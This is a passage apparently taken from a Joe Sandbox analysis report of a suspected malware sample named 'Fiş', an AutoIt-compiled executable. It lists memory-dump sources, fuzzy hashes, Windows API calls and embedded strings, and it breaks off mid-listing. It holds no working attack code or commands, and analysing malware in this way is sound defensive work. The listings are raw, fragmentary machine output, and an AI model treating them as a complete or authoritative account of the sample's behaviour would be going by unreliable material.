                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13c02fc80124968a49d91b17c45caa7ddc46c51eebdf9e0a08ad718ff0fea245
                                                        • Instruction ID: ed25f3f2ff1f7dc402a2c9dbc3b85b8723539fae349b27b9d6067a4c3506e6a9
                                                        • Opcode Fuzzy Hash: 13c02fc80124968a49d91b17c45caa7ddc46c51eebdf9e0a08ad718ff0fea245
                                                        • Instruction Fuzzy Hash: 5622DF70904205CFDB24DF58E480AAEB7F0FF58308F1494A9E99ABB351E335AD85CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e3e481488c0e390ff69b53333499fbd3be763fb75de0402b69b273b08de7b2b
                                                        • Instruction ID: d080bc49351af32f6e1ba4ba5ef29a1ad40a967c0a3859c4c2d1a6722286a5c5
                                                        • Opcode Fuzzy Hash: 2e3e481488c0e390ff69b53333499fbd3be763fb75de0402b69b273b08de7b2b
                                                        • Instruction Fuzzy Hash: D0129B70A006099FDF04DFA5E981AEEB7F5FF48300F20A569E806F7295EB35A915CB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3728558374-0
                                                        • Opcode ID: 6100a8bea46664715e9b1f13b0def0c1537d07a5ff636e449477813651b46178
                                                        • Instruction ID: 0cca7289b6c59ce23f5c40f5dd794f89682d88ce43c0d03a72e23eaa7955315b
                                                        • Opcode Fuzzy Hash: 6100a8bea46664715e9b1f13b0def0c1537d07a5ff636e449477813651b46178
                                                        • Instruction Fuzzy Hash: 4F029070A00205DFCF14DF68E991AAEBBF5EF48300F149469E906FB295EB31DA15CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction ID: 2dbd40c2cf18360bf94a8802ea5bdbdcea38ef731792b99c83d50c47e71e1d3a
                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                        • Instruction Fuzzy Hash: 02C1D8322451A30ADF2D4639E43543FBBA15E917FA31A2B6DD8B3DB5D1EF10C528D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction ID: 06fa4d4cb08f101c5f1342556a37f6e68e6ed0ec68f2b1a4ab35486d6d8fe4dd
                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                        • Instruction Fuzzy Hash: F4C1F8322451A309DF2D4639D43443FBBA15EA27FA30A2B6DD8B3EB0D5EF10D528D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 91de0da480be2b40fb4e420626cc70ae857a7efa90e289465aca69218d42b8e9
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 73C1B03220509309DF2D4639D43553EFAA15AA2BBB31A2F7DDCB2DB5D5EF20C528D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: e70993291a3379da71f5f8018d32595e096822f0d5b30aa41afab10ee9502e17
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: 0F41A271D1051CEBCF48CFADC991AAEBBF2EF88201F548299D516AB345D730AB41DB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: e2c9c6c43067ac72fb5095c8ef611d49ee048ee2336c1c6a57cce1f9921280b4
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: 8C018078A01249EFCB44DF98C5909AEF7F5FB48310B2085D9E819A7301D730AE41DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: 6e55abbdf3cabd055769d40d96dfe72ff3dd101f3fb1b077e92e7667206f54cd
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: D3018078A01109EFCB44DF98C5909AEF7F5FB88310F208699E819A7301D730AE41DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00E9A2FE
                                                        • DeleteObject.GDI32(00000000), ref: 00E9A310
                                                        • DestroyWindow.USER32 ref: 00E9A31E
                                                        • GetDesktopWindow.USER32 ref: 00E9A338
                                                        • GetWindowRect.USER32(00000000), ref: 00E9A33F
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E9A480
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E9A490
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A4D8
                                                        • GetClientRect.USER32(00000000,?), ref: 00E9A4E4
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E9A51E
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A540
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A553
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A55E
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E9A567
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A576
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E9A57F
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A586
                                                        • GlobalFree.KERNEL32(00000000), ref: 00E9A591
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A5A3
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00ECD9BC,00000000), ref: 00E9A5B9
                                                        • GlobalFree.KERNEL32(00000000), ref: 00E9A5C9
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E9A5EF
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E9A60E
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A630
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E9A81D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: 1ae829a88c94ca9fc94052d9f9f2ebca619fc21a93372a5a2940a164d753448f
                                                        • Instruction ID: 257385a365d5010335a329e65c01c4628b0bb61d4672fafe6dd4a8b54d5054ce
                                                        • Opcode Fuzzy Hash: 1ae829a88c94ca9fc94052d9f9f2ebca619fc21a93372a5a2940a164d753448f
                                                        • Instruction Fuzzy Hash: C1025B71900218AFDB14DFA5DD89EAE7BB9FF48314F048168F915BB2A1C771AD41CBA0
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00EAD2DB
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EAD30C
                                                        • GetSysColor.USER32(0000000F), ref: 00EAD318
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00EAD332
                                                        • SelectObject.GDI32(?,00000000), ref: 00EAD341
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EAD36C
                                                        • GetSysColor.USER32(00000010), ref: 00EAD374
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00EAD37B
                                                        • FrameRect.USER32(?,?,00000000), ref: 00EAD38A
                                                        • DeleteObject.GDI32(00000000), ref: 00EAD391
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00EAD3DC
                                                        • FillRect.USER32(?,?,00000000), ref: 00EAD40E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EAD439
                                                          • Part of subcall function 00EAD575: GetSysColor.USER32(00000012), ref: 00EAD5AE
                                                          • Part of subcall function 00EAD575: SetTextColor.GDI32(?,?), ref: 00EAD5B2
                                                          • Part of subcall function 00EAD575: GetSysColorBrush.USER32(0000000F), ref: 00EAD5C8
                                                          • Part of subcall function 00EAD575: GetSysColor.USER32(0000000F), ref: 00EAD5D3
                                                          • Part of subcall function 00EAD575: GetSysColor.USER32(00000011), ref: 00EAD5F0
                                                          • Part of subcall function 00EAD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAD5FE
                                                          • Part of subcall function 00EAD575: SelectObject.GDI32(?,00000000), ref: 00EAD60F
                                                          • Part of subcall function 00EAD575: SetBkColor.GDI32(?,00000000), ref: 00EAD618
                                                          • Part of subcall function 00EAD575: SelectObject.GDI32(?,?), ref: 00EAD625
                                                          • Part of subcall function 00EAD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00EAD644
                                                          • Part of subcall function 00EAD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAD65B
                                                          • Part of subcall function 00EAD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00EAD670
                                                          • Part of subcall function 00EAD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EAD698
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: ecee00f291bb90ac4defe0c5ea2948263690cf584cf58bc5274b6e0cfc619254
                                                        • Instruction ID: 739e46af27061e29b7b652dd0b26556dc8d14a4865aeafe0ec3b377a2d7eec95
                                                        • Opcode Fuzzy Hash: ecee00f291bb90ac4defe0c5ea2948263690cf584cf58bc5274b6e0cfc619254
                                                        • Instruction Fuzzy Hash: AF91827140D305FFCB109F55DC08E5BBBA9FF89325F101A29F962A61A0D732E949CB52
                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00E5B98B
                                                        • DeleteObject.GDI32(00000000), ref: 00E5B9CD
                                                        • DeleteObject.GDI32(00000000), ref: 00E5B9D8
                                                        • DestroyIcon.USER32(00000000), ref: 00E5B9E3
                                                        • DestroyWindow.USER32(00000000), ref: 00E5B9EE
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EBD2AA
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EBD2E3
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00EBD711
                                                          • Part of subcall function 00E5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E5B759,?,00000000,?,?,?,?,00E5B72B,00000000,?), ref: 00E5BA58
                                                        • SendMessageW.USER32 ref: 00EBD758
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EBD76F
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EBD785
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00EBD790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: aa71a7caa7fa860c41404672ffdfc0735f02da091b681b85c0ac225945e4373e
                                                        • Instruction ID: 0300586d90c3ccf9f8e993727e345a49e9517b47ac8654519de65f2d61f70099
                                                        • Opcode Fuzzy Hash: aa71a7caa7fa860c41404672ffdfc0735f02da091b681b85c0ac225945e4373e
                                                        • Instruction Fuzzy Hash: 79128D30108211DFDB25CF14C884BEAB7E5FF45309F146979E999EB262D732E84ACB91
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E8DBD6
                                                        • GetDriveTypeW.KERNEL32(?,00EDDC54,?,\\.\,00EDDC00), ref: 00E8DCC3
                                                        • SetErrorMode.KERNEL32(00000000,00EDDC54,?,\\.\,00EDDC00), ref: 00E8DE29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 8c578c143fc7cb52df3b2c0924971a723070db3fa8fc146d12eb759d08003aeb
                                                        • Instruction ID: 5c668f99c5222ed346309ad030712c8ab19f58c6bf72cba5f54288bc3b04d3be
                                                        • Opcode Fuzzy Hash: 8c578c143fc7cb52df3b2c0924971a723070db3fa8fc146d12eb759d08003aeb
                                                        • Instruction Fuzzy Hash: F7518E3024C306AB8610FF21CC91879B7E1FB94709B247A1AF50FBB2E1DA61DD46DB42
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: f6c1543e041725fbe674f025df46aa5b71d07ffc123b19ece533944cdd7980fe
                                                        • Instruction ID: 71e544c1b6d89f4854408c4a1a6dbfa96ea827390d4831b4078c29c15120f1a9
                                                        • Opcode Fuzzy Hash: f6c1543e041725fbe674f025df46aa5b71d07ffc123b19ece533944cdd7980fe
                                                        • Instruction Fuzzy Hash: 02810530641305AACB65AE65EC82FFB77A9EF14344F247029FA05BB1C6EB61D906C291
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00EAC788
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00EAC83E
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00EAC859
                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00EACB15
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0
                                                        • API String ID: 2326795674-4108050209
                                                        • Opcode ID: fbef96793ee13abbfcbb1a152c3bc41ef0ad5915cb9c4b695a8151986a90f9df
                                                        • Instruction ID: 6fabe1c9f87ef7ddd4735a34d92cbe4e74133bcdc8b286ba8fa372ee42298435
                                                        • Opcode Fuzzy Hash: fbef96793ee13abbfcbb1a152c3bc41ef0ad5915cb9c4b695a8151986a90f9df
                                                        • Instruction Fuzzy Hash: 75F1D470108301AFD7158F28CC45BAABBE4FF4E318F24192DF599BA2A1C776E845DB91
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,00EDDC00), ref: 00EA6449
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 3964851224-45149045
                                                        • Opcode ID: 572de97e90ebecc5ede5655e27fe66833fe869e7f9b40cf4e09115e8940109a3
                                                        • Instruction ID: eff745790c0e5fdda7aee2e8d585144b50868c03754d271669f27c9c4ed18a98
                                                        • Opcode Fuzzy Hash: 572de97e90ebecc5ede5655e27fe66833fe869e7f9b40cf4e09115e8940109a3
                                                        • Instruction Fuzzy Hash: 78C151702042558BCB08EF10C551AAEB7D5AFDA344F186859F9967B3E2DB20FD4ACB41
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00EAD5AE
